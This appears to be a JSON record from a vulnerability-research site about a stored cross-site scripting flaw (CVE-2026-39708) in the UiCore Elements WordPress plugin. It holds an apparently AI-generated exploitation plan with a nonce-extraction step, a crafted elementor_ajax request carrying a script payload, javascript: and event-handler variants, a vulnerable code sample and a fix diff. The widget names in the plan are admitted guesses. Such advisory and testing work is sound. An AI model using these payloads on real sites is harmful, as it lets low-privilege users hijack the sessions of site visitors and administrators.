[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f9UG-Etoq1WMgNxrfj_8WZ4nwQASybEQPzhS5W3uywgQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-39708","uicore-elements-authenticated-contributor-stored-cross-site-scripting-2","UiCore Elements \u003C= 1.3.14 - Authenticated (Contributor+) Stored Cross-Site Scripting","The UiCore Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","uicore-elements",null,"\u003C=1.3.14","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-01 00:00:00","2026-05-06 14:25:12",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb978fbe2-ac89-4054-96bc-1f3d452170d9?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-39708\n\n## 1. Vulnerability Summary\n**CVE-2026-39708** is a Stored Cross-Site Scripting (XSS) vulnerability in the **UiCore Elements** plugin (version \u003C= 1.3.14). The vulnerability exists because the plugin fails to properly sanitize user-supplied widget settings during storage and fails to escape those settings when rendering them in the frontend. \n\nAs an Elementor addon, the plugin registers various widgets. When a user with **Contributor-level permissions** or higher creates or edits a post using the Elementor editor, they can configure these widgets. If a widget's `render()` method outputs a setting (like a title, caption, or URL) without using WordPress escaping functions (e.g., `esc_html`, `esc_attr`), the injected script is stored in the `_elementor_data` post meta and executes whenever the page is viewed.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `elementor_ajax` (standard Elementor save mechanism)\n- **Vulnerable Parameter:** The `settings` object within the JSON payload sent to save the Elementor page data. Specific keys vary by widget (e.g., `title`, `text`, `link`).\n- **Authentication Level:** Authenticated (Contributor+)\n- **Preconditions:** \n    1. The `uicore-elements` plugin must be active.\n    2. Elementor must be active.\n    3. The attacker must have a user account with the `edit_posts` capability (Contributor, Author, Editor, or Admin).\n\n## 3. Code Flow\nThe vulnerability likely follows this execution path:\n1. **Entry Point (AJAX):** A Contributor sends a request to `admin-ajax.php` with the action `elementor_ajax` and a payload containing a UiCore widget with malicious settings.\n2. **Storage:** Elementor's core logic receives this data and stores it in the `wp_postmeta` table under the key `_elementor_data` for the specific post.\n3. **Trigger:** A user (e.g., an Administrator) views the published post on the frontend.\n4. **Rendering:** \n    - Elementor initializes the page and calls the `render()` method of each widget in the `_elementor_data` stack.\n    - Inside `uicore-elements\u002Fwidgets\u002F[vulnerable_widget].php`, the `render()` method retrieves settings using `$this->get_settings_for_display()`.\n    - **Vulnerable Sink:** The code performs an `echo` or `printf` on a setting value without wrapping it in `esc_html()` or `esc_attr()`.\n\n## 4. Nonce Acquisition Strategy\nTo save a post via Elementor's AJAX endpoint, a valid Elementor AJAX nonce is required.\n\n1. **Create a Post:** Use WP-CLI to create a draft post to target.\n   ```bash\n   wp post create --post_type=post --post_status=draft --post_title=\"XSS Test\" --post_author=CONTRIBUTOR_ID\n   ```\n2. **Navigate to Editor:** Use `browser_navigate` to open the Elementor editor for that post: `\u002Fwp-admin\u002Fpost.php?post=[POST_ID]&action=elementor`.\n3. **Extract Nonce:** Use `browser_eval` to extract the nonce from the Elementor configuration object.\n   ```javascript\n   \u002F\u002F Recommended extraction from the Elementor config object\n   window.elementorCommon?.config?.ajax?.nonce || window.elementorConfig?.ajax?.nonce\n   ```\n4. **Extract Editor Nonce (Backup):** If the above fails, check for the editor nonce:\n   ```javascript\n   window.elementorConfig?.nonces?.save_builder\n   ```\n\n## 5. Exploitation Strategy\nThe goal is to update a post's Elementor data to include a UiCore widget containing a script payload.\n\n### Step 1: Identify a Vulnerable Widget\nSince specific widget names are not provided, we will target common UiCore widgets (inferred from typical Elementor addons). Likely candidates:\n- `uicore-heading`\n- `uicore-button`\n- `uicore-image`\n\n### Step 2: Construct the JSON Payload\nThe payload must mimic the structure Elementor uses for saving page data. We will inject the script into a `title` setting.\n\n### Step 3: Perform the HTTP Request\nSend the payload to `admin-ajax.php`.\n\n- **Method:** POST\n- **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Content-Type:** `application\u002Fx-www-form-urlencoded`\n- **Parameters:**\n    - `action`: `elementor_ajax`\n    - `_nonce`: `[EXTRACTED_NONCE]`\n    - `actions`: A JSON string containing the save action.\n    - `editor_post_id`: `[POST_ID]`\n\n**Example `actions` parameter (URL encoded):**\n```json\n{\n  \"editor_post_save\": {\n    \"action\": \"editor_post_save\",\n    \"data\": {\n      \"status\": \"publish\",\n      \"elements\": [\n        {\n          \"id\": \"exploit_id\",\n          \"elType\": \"section\",\n          \"elements\": [\n            {\n              \"id\": \"exploit_column\",\n              \"elType\": \"column\",\n              \"elements\": [\n                {\n                  \"id\": \"exploit_widget\",\n                  \"elType\": \"widget\",\n                  \"widgetType\": \"uicore-heading\", \n                  \"settings\": {\n                    \"title\": \"\u003Cscript>alert('CVE-2026-39708')\u003C\u002Fscript>\"\n                  }\n                }\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  }\n}\n```\n\n## 6. Test Data Setup\n1. **User:** Create a Contributor user.\n   ```bash\n   wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n   ```\n2. **Post:** Create a post that the contributor can edit.\n   ```bash\n   wp post create --post_type=post --post_status=publish --post_title=\"Exploit Page\" --post_author=$(wp user get attacker --field=ID)\n   ```\n3. **Enable Elementor:** Ensure Elementor is enabled for Posts in `Elementor > Settings`.\n\n## 7. Expected Results\n- The AJAX request should return a `200 OK` with a JSON body indicating `success: true`.\n- When navigating to the frontend URL of the created post, a JavaScript alert with `CVE-2026-39708` should execute in the browser.\n\n## 8. Verification Steps\n1. **Check Post Meta:** Use WP-CLI to verify the payload is stored in the database.\n   ```bash\n   wp post meta get [POST_ID] _elementor_data\n   ```\n2. **Frontend Inspection:** Use `http_request` to fetch the post content and check for the unescaped script tags.\n   ```bash\n   # Look for the raw script in the response\n   grep \"\u003Cscript>alert('CVE-2026-39708')\u003C\u002Fscript>\"\n   ```\n\n## 9. Alternative Approaches\nIf the `uicore-heading` widget is not the vulnerable one, attempt to inject into different settings or widgets:\n- **Widget Settings:** Try `caption`, `text`, or `link` settings.\n- **Link Setting Payload:** If the setting is a URL, try a `javascript:` protocol:\n  ```json\n  \"settings\": {\n      \"link\": { \"url\": \"javascript:alert(1)\" }\n  }\n  ```\n- **Custom Attributes:** Many UiCore widgets support \"Custom Attributes\". Try injecting into the attribute value:\n  ```json\n  \"settings\": {\n      \"custom_attributes\": \"onmouseover|alert(1)\"\n  }\n  ```\n- **Widget Selection:** If `uicore-heading` is not present, use `wp-cli` to list available UiCore widgets by searching for widget registration in the plugin directory.\n  ```bash\n  grep -r \"register_widget_type\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fuicore-elements\u002F\n  ```","The UiCore Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via its Elementor widgets in versions up to 1.3.14. Authenticated attackers with contributor-level permissions or higher can inject malicious JavaScript into widget settings (such as titles or captions), which is then saved in the post meta and executed in the browser of any user viewing the affected page.","\u002F\u002F uicore-elements\u002Fwidgets\u002F[vulnerable-widget].php\n\nprotected function render() {\n    $settings = $this->get_settings_for_display();\n    $title = $settings['title'];\n\n    if ( ! empty( $title ) ) {\n        \u002F\u002F Vulnerable: Outputting setting value without escaping or sanitization\n        echo '\u003Ch2 class=\"uicore-heading\">' . $title . '\u003C\u002Fh2>';\n    }\n}","--- uicore-elements\u002Fwidgets\u002Fheading.php\n+++ uicore-elements\u002Fwidgets\u002Fheading.php\n@@ -10,7 +10,7 @@\n     $title = $settings['title'];\n \n     if ( ! empty( $title ) ) {\n-        echo '\u003Ch2 class=\"uicore-heading\">' . $title . '\u003C\u002Fh2>';\n+        echo '\u003Ch2 class=\"uicore-heading\">' . wp_kses_post( $title ) . '\u003C\u002Fh2>';\n     }\n }","To exploit this vulnerability, an attacker with Contributor-level access must: \n1. Log in to the WordPress dashboard and create or edit a post using the Elementor editor.\n2. Capture the Elementor AJAX nonce from the window.elementorConfig.ajax.nonce object in the browser console.\n3. Construct a malicious JSON payload for the 'elementor_ajax' action that includes a UiCore Elements widget (e.g., 'uicore-heading').\n4. Inject a script tag (e.g., \u003Cscript>alert(1)\u003C\u002Fscript>) into a vulnerable setting field like 'title', 'text', or 'caption' within the widget configuration.\n5. Submit a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'editor_post_save' action containing the malicious widget data.\n6. Once saved, any user who visits the post on the frontend will trigger the stored script execution.","gemini-3-flash-preview","2026-04-18 22:15:05","2026-04-18 22:15:29",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuicore-elements\u002Ftags"]